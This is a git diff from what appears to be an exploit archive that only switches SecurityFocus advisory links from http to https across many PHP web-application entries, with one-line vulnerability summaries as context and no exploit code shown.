12aa7be00..54b143a32 100644 --- a/exploits/php/webapps/27265.txt +++ b/exploits/php/webapps/27265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/27266.txt b/exploits/php/webapps/27266.txt index e6ee70b45..aed058a16 100644 --- a/exploits/php/webapps/27266.txt +++ b/exploits/php/webapps/27266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27267.txt b/exploits/php/webapps/27267.txt index 1db3c23b2..96ec6bc28 100644 --- a/exploits/php/webapps/27267.txt +++ b/exploits/php/webapps/27267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27268.txt b/exploits/php/webapps/27268.txt index 3f555cf55..a252c2aad 100644 --- a/exploits/php/webapps/27268.txt +++ b/exploits/php/webapps/27268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27269.txt b/exploits/php/webapps/27269.txt index d84370975..ec82419d9 100644 --- a/exploits/php/webapps/27269.txt +++ b/exploits/php/webapps/27269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27298.txt b/exploits/php/webapps/27298.txt index ff5e27d46..9ad0097b0 100644 --- a/exploits/php/webapps/27298.txt +++ b/exploits/php/webapps/27298.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16789/info +source: https://www.securityfocus.com/bid/16789/info Web Calendar Pro is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27299.txt b/exploits/php/webapps/27299.txt index 2e711c503..4097577cc 100644 --- a/exploits/php/webapps/27299.txt +++ b/exploits/php/webapps/27299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27300.txt b/exploits/php/webapps/27300.txt index 034325d22..2610684e3 100644 --- a/exploits/php/webapps/27300.txt +++ b/exploits/php/webapps/27300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27301.txt b/exploits/php/webapps/27301.txt index eccb70770..a7d2ce330 100644 --- a/exploits/php/webapps/27301.txt +++ b/exploits/php/webapps/27301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27302.txt b/exploits/php/webapps/27302.txt index f935a3a4c..e35ab3c3a 100644 --- a/exploits/php/webapps/27302.txt +++ b/exploits/php/webapps/27302.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16793/info +source: https://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27303.txt b/exploits/php/webapps/27303.txt index 0750e9d37..442a360e8 100644 --- a/exploits/php/webapps/27303.txt +++ b/exploits/php/webapps/27303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16794/info +source: https://www.securityfocus.com/bid/16794/info Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27304.html b/exploits/php/webapps/27304.html index 274964790..8ce58df74 100644 --- a/exploits/php/webapps/27304.html +++ b/exploits/php/webapps/27304.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16796/info +source: https://www.securityfocus.com/bid/16796/info CubeCart is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27305.txt b/exploits/php/webapps/27305.txt index 4ea731226..654e65b22 100644 --- a/exploits/php/webapps/27305.txt +++ b/exploits/php/webapps/27305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16799/info +source: https://www.securityfocus.com/bid/16799/info PHPX is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27306.txt b/exploits/php/webapps/27306.txt index 0fd5ac1ac..7c7ac6b51 100644 --- a/exploits/php/webapps/27306.txt +++ b/exploits/php/webapps/27306.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16810/info +source: https://www.securityfocus.com/bid/16810/info JGS-Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27307.txt b/exploits/php/webapps/27307.txt index cf43a9895..e21db005d 100644 --- a/exploits/php/webapps/27307.txt +++ b/exploits/php/webapps/27307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16810/info +source: https://www.securityfocus.com/bid/16810/info JGS-Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27308.txt b/exploits/php/webapps/27308.txt index 4eed73c38..3148808ac 100644 --- a/exploits/php/webapps/27308.txt +++ b/exploits/php/webapps/27308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16815/info +source: https://www.securityfocus.com/bid/16815/info MyPHPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27309.txt b/exploits/php/webapps/27309.txt index 2ea8120ef..587eed06c 100644 --- a/exploits/php/webapps/27309.txt +++ b/exploits/php/webapps/27309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16815/info +source: https://www.securityfocus.com/bid/16815/info MyPHPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27311.txt b/exploits/php/webapps/27311.txt index 73ad63211..316370c66 100644 --- a/exploits/php/webapps/27311.txt +++ b/exploits/php/webapps/27311.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16822/info +source: https://www.securityfocus.com/bid/16822/info SPiD is prone to a local file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27312.txt b/exploits/php/webapps/27312.txt index 41f8f2806..cfacf135d 100644 --- a/exploits/php/webapps/27312.txt +++ b/exploits/php/webapps/27312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16823/info +source: https://www.securityfocus.com/bid/16823/info Website generator is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27313.txt b/exploits/php/webapps/27313.txt index e97395af5..4b68fc204 100644 --- a/exploits/php/webapps/27313.txt +++ b/exploits/php/webapps/27313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16828/info +source: https://www.securityfocus.com/bid/16828/info DCI-Taskeen is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27314.txt b/exploits/php/webapps/27314.txt index e330adebc..5768fdfbe 100644 --- a/exploits/php/webapps/27314.txt +++ b/exploits/php/webapps/27314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16828/info +source: https://www.securityfocus.com/bid/16828/info DCI-Taskeen is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27318.txt b/exploits/php/webapps/27318.txt index 19c49d193..a9619c37e 100644 --- a/exploits/php/webapps/27318.txt +++ b/exploits/php/webapps/27318.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16831/info +source: https://www.securityfocus.com/bid/16831/info PHP-Nuke is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27321.txt b/exploits/php/webapps/27321.txt index b1848e736..051b33b08 100644 --- a/exploits/php/webapps/27321.txt +++ b/exploits/php/webapps/27321.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16842/info +source: https://www.securityfocus.com/bid/16842/info Fantastic News is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/27322.txt b/exploits/php/webapps/27322.txt index 0248dc06f..417709890 100644 --- a/exploits/php/webapps/27322.txt +++ b/exploits/php/webapps/27322.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16843/info +source: https://www.securityfocus.com/bid/16843/info Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27323.txt b/exploits/php/webapps/27323.txt index b282c637e..8ff321858 100644 --- a/exploits/php/webapps/27323.txt +++ b/exploits/php/webapps/27323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16843/info +source: https://www.securityfocus.com/bid/16843/info Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27324.txt b/exploits/php/webapps/27324.txt index fc3aa66e0..07361cff7 100644 --- a/exploits/php/webapps/27324.txt +++ b/exploits/php/webapps/27324.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16848/info +source: https://www.securityfocus.com/bid/16848/info Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. diff --git a/exploits/php/webapps/27327.txt b/exploits/php/webapps/27327.txt index 2441ace17..09b6d814c 100644 --- a/exploits/php/webapps/27327.txt +++ b/exploits/php/webapps/27327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16853/info +source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27328.txt b/exploits/php/webapps/27328.txt index adc5eba42..167e62628 100644 --- a/exploits/php/webapps/27328.txt +++ b/exploits/php/webapps/27328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16853/info +source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27330.txt b/exploits/php/webapps/27330.txt index 8ead9843d..0a764386c 100644 --- a/exploits/php/webapps/27330.txt +++ b/exploits/php/webapps/27330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27331.txt b/exploits/php/webapps/27331.txt index d69a5d4c2..e29a0dd59 100644 --- a/exploits/php/webapps/27331.txt +++ b/exploits/php/webapps/27331.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27332.txt b/exploits/php/webapps/27332.txt index 194b9ba6f..c26800595 100644 --- a/exploits/php/webapps/27332.txt +++ b/exploits/php/webapps/27332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16858/info +source: https://www.securityfocus.com/bid/16858/info The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27333.txt b/exploits/php/webapps/27333.txt index 235022fe6..44ffeda98 100644 --- a/exploits/php/webapps/27333.txt +++ b/exploits/php/webapps/27333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16874/info +source: https://www.securityfocus.com/bid/16874/info QwikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27336.txt b/exploits/php/webapps/27336.txt index 42cf6e83b..23a0c95ac 100644 --- a/exploits/php/webapps/27336.txt +++ b/exploits/php/webapps/27336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16879/info +source: https://www.securityfocus.com/bid/16879/info EJ3 TOPo is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27337.txt b/exploits/php/webapps/27337.txt index a794dcc83..2dd69a477 100644 --- a/exploits/php/webapps/27337.txt +++ b/exploits/php/webapps/27337.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16881/info +source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. diff --git a/exploits/php/webapps/27338.txt b/exploits/php/webapps/27338.txt index e38f2153c..2d2ecc903 100644 --- a/exploits/php/webapps/27338.txt +++ b/exploits/php/webapps/27338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16885/info +source: https://www.securityfocus.com/bid/16885/info PEHEPE Membership Management System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27339.txt b/exploits/php/webapps/27339.txt index fa3ab3f9b..764821dc5 100644 --- a/exploits/php/webapps/27339.txt +++ b/exploits/php/webapps/27339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16887/info +source: https://www.securityfocus.com/bid/16887/info PEHEPE Membership Management System is prone to a remote PHP code-injection vulnerability. diff --git a/exploits/php/webapps/27340.txt b/exploits/php/webapps/27340.txt index 5064ea444..c701b8e3f 100644 --- a/exploits/php/webapps/27340.txt +++ b/exploits/php/webapps/27340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16905/info +source: https://www.securityfocus.com/bid/16905/info SMBlog is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27341.txt b/exploits/php/webapps/27341.txt index 69b9ac0df..7f464f92c 100644 --- a/exploits/php/webapps/27341.txt +++ b/exploits/php/webapps/27341.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16909/info +source: https://www.securityfocus.com/bid/16909/info Dawaween is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27342.txt b/exploits/php/webapps/27342.txt index eb5b28549..0c47ff2b1 100644 --- a/exploits/php/webapps/27342.txt +++ b/exploits/php/webapps/27342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16915/info +source: https://www.securityfocus.com/bid/16915/info PluggedOut Nexus is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27343.txt b/exploits/php/webapps/27343.txt index 7821427eb..16d1e7f96 100644 --- a/exploits/php/webapps/27343.txt +++ b/exploits/php/webapps/27343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16919/info +source: https://www.securityfocus.com/bid/16919/info vBulletin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27344.txt b/exploits/php/webapps/27344.txt index b072ae196..57b5c32f1 100644 --- a/exploits/php/webapps/27344.txt +++ b/exploits/php/webapps/27344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16931/info +source: https://www.securityfocus.com/bid/16931/info NZ Ecommerce is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27345.txt b/exploits/php/webapps/27345.txt index 8bce099be..2f53ca629 100644 --- a/exploits/php/webapps/27345.txt +++ b/exploits/php/webapps/27345.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16932/info +source: https://www.securityfocus.com/bid/16932/info LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27346.txt b/exploits/php/webapps/27346.txt index 1737e8558..4600c2cf8 100644 --- a/exploits/php/webapps/27346.txt +++ b/exploits/php/webapps/27346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16955/info +source: https://www.securityfocus.com/bid/16955/info VBZooM Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27347.txt b/exploits/php/webapps/27347.txt index 807d687a6..f737719d1 100644 --- a/exploits/php/webapps/27347.txt +++ b/exploits/php/webapps/27347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16956/info +source: https://www.securityfocus.com/bid/16956/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27348.txt b/exploits/php/webapps/27348.txt index eac5da001..0f04e423e 100644 --- a/exploits/php/webapps/27348.txt +++ b/exploits/php/webapps/27348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16956/info +source: https://www.securityfocus.com/bid/16956/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27354.txt b/exploits/php/webapps/27354.txt index e6bac3bae..05ba377c6 100644 --- a/exploits/php/webapps/27354.txt +++ b/exploits/php/webapps/27354.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16958/info +source: https://www.securityfocus.com/bid/16958/info Easy Forum is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27355.txt b/exploits/php/webapps/27355.txt index 88e8f4467..740e8926f 100644 --- a/exploits/php/webapps/27355.txt +++ b/exploits/php/webapps/27355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16959/info +source: https://www.securityfocus.com/bid/16959/info Woltlab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27356.txt b/exploits/php/webapps/27356.txt index 1bd5008f0..a67947647 100644 --- a/exploits/php/webapps/27356.txt +++ b/exploits/php/webapps/27356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16961/info +source: https://www.securityfocus.com/bid/16961/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27357.txt b/exploits/php/webapps/27357.txt index b85cc3794..3269b772b 100644 --- a/exploits/php/webapps/27357.txt +++ b/exploits/php/webapps/27357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16965/info +source: https://www.securityfocus.com/bid/16965/info Simplog is prone to an information-disclosure vulnerability. The application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27358.txt b/exploits/php/webapps/27358.txt index 89645e084..bf173290a 100644 --- a/exploits/php/webapps/27358.txt +++ b/exploits/php/webapps/27358.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16968/info +source: https://www.securityfocus.com/bid/16968/info DVGuestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27359.txt b/exploits/php/webapps/27359.txt index 62165a28a..482624bb5 100644 --- a/exploits/php/webapps/27359.txt +++ b/exploits/php/webapps/27359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16968/info +source: https://www.securityfocus.com/bid/16968/info DVGuestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27360.txt b/exploits/php/webapps/27360.txt index b2688672a..96ace2dc1 100644 --- a/exploits/php/webapps/27360.txt +++ b/exploits/php/webapps/27360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16970/info +source: https://www.securityfocus.com/bid/16970/info RunCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27361.txt b/exploits/php/webapps/27361.txt index 16a7a82b8..42fda41c9 100644 --- a/exploits/php/webapps/27361.txt +++ b/exploits/php/webapps/27361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16971/info +source: https://www.securityfocus.com/bid/16971/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27362.txt b/exploits/php/webapps/27362.txt index 6df490b97..4a840e3cd 100644 --- a/exploits/php/webapps/27362.txt +++ b/exploits/php/webapps/27362.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16973/info +source: https://www.securityfocus.com/bid/16973/info The bitweaver application is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27363.txt b/exploits/php/webapps/27363.txt index 68818bad3..35b2578b5 100644 --- a/exploits/php/webapps/27363.txt +++ b/exploits/php/webapps/27363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16977/info +source: https://www.securityfocus.com/bid/16977/info The PHORUM application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27364.txt b/exploits/php/webapps/27364.txt index 19fd1b3b0..aece7305a 100644 --- a/exploits/php/webapps/27364.txt +++ b/exploits/php/webapps/27364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16979/info +source: https://www.securityfocus.com/bid/16979/info Game-Panel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27367.txt b/exploits/php/webapps/27367.txt index d255801a2..6835d4f58 100644 --- a/exploits/php/webapps/27367.txt +++ b/exploits/php/webapps/27367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17001/info +source: https://www.securityfocus.com/bid/17001/info Link Bank is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27368.txt b/exploits/php/webapps/27368.txt index 7b8ed21eb..181e18545 100644 --- a/exploits/php/webapps/27368.txt 
+++ b/exploits/php/webapps/27368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27369.txt b/exploits/php/webapps/27369.txt index 141b3f105..fde44207e 100644 --- a/exploits/php/webapps/27369.txt +++ b/exploits/php/webapps/27369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27370.txt b/exploits/php/webapps/27370.txt index 17a501da6..3ef0198b5 100644 --- a/exploits/php/webapps/27370.txt +++ b/exploits/php/webapps/27370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17023/info +source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: diff --git a/exploits/php/webapps/27371.txt b/exploits/php/webapps/27371.txt index 0549edbcc..ba594df32 100644 --- a/exploits/php/webapps/27371.txt +++ b/exploits/php/webapps/27371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17025/info +source: https://www.securityfocus.com/bid/17025/info HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27372.txt b/exploits/php/webapps/27372.txt index 9bdeafde8..19c33611e 100644 --- a/exploits/php/webapps/27372.txt +++ b/exploits/php/webapps/27372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17025/info +source: https://www.securityfocus.com/bid/17025/info HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/27373.txt b/exploits/php/webapps/27373.txt index 3b0f7383a..23e2bb9fd 100644 --- a/exploits/php/webapps/27373.txt +++ b/exploits/php/webapps/27373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17029/info +source: https://www.securityfocus.com/bid/17029/info The 'textfileBB' application is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27374.txt b/exploits/php/webapps/27374.txt index c92349dbc..b1ad29d9b 100644 --- a/exploits/php/webapps/27374.txt +++ b/exploits/php/webapps/27374.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17044/info +source: https://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27375.txt b/exploits/php/webapps/27375.txt index 28b76630b..3debf753a 100644 --- a/exploits/php/webapps/27375.txt +++ b/exploits/php/webapps/27375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17044/info +source: https://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27379.txt b/exploits/php/webapps/27379.txt index 20ab1ccd2..7ca99c43b 100644 --- a/exploits/php/webapps/27379.txt +++ b/exploits/php/webapps/27379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17047/info +source: https://www.securityfocus.com/bid/17047/info ADP Forum is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. 
diff --git a/exploits/php/webapps/27380.txt b/exploits/php/webapps/27380.txt index 129e4c7b9..1b83430e7 100644 --- a/exploits/php/webapps/27380.txt +++ b/exploits/php/webapps/27380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27381.txt b/exploits/php/webapps/27381.txt index 628a933c2..94898ee8f 100644 --- a/exploits/php/webapps/27381.txt +++ b/exploits/php/webapps/27381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27382.txt b/exploits/php/webapps/27382.txt index da3b07984..5e12cf940 100644 --- a/exploits/php/webapps/27382.txt +++ b/exploits/php/webapps/27382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27383.txt b/exploits/php/webapps/27383.txt index 987f3d681..3f2ef2b44 100644 --- a/exploits/php/webapps/27383.txt +++ b/exploits/php/webapps/27383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27384.txt b/exploits/php/webapps/27384.txt index 2649e2328..7ed23e598 100644 
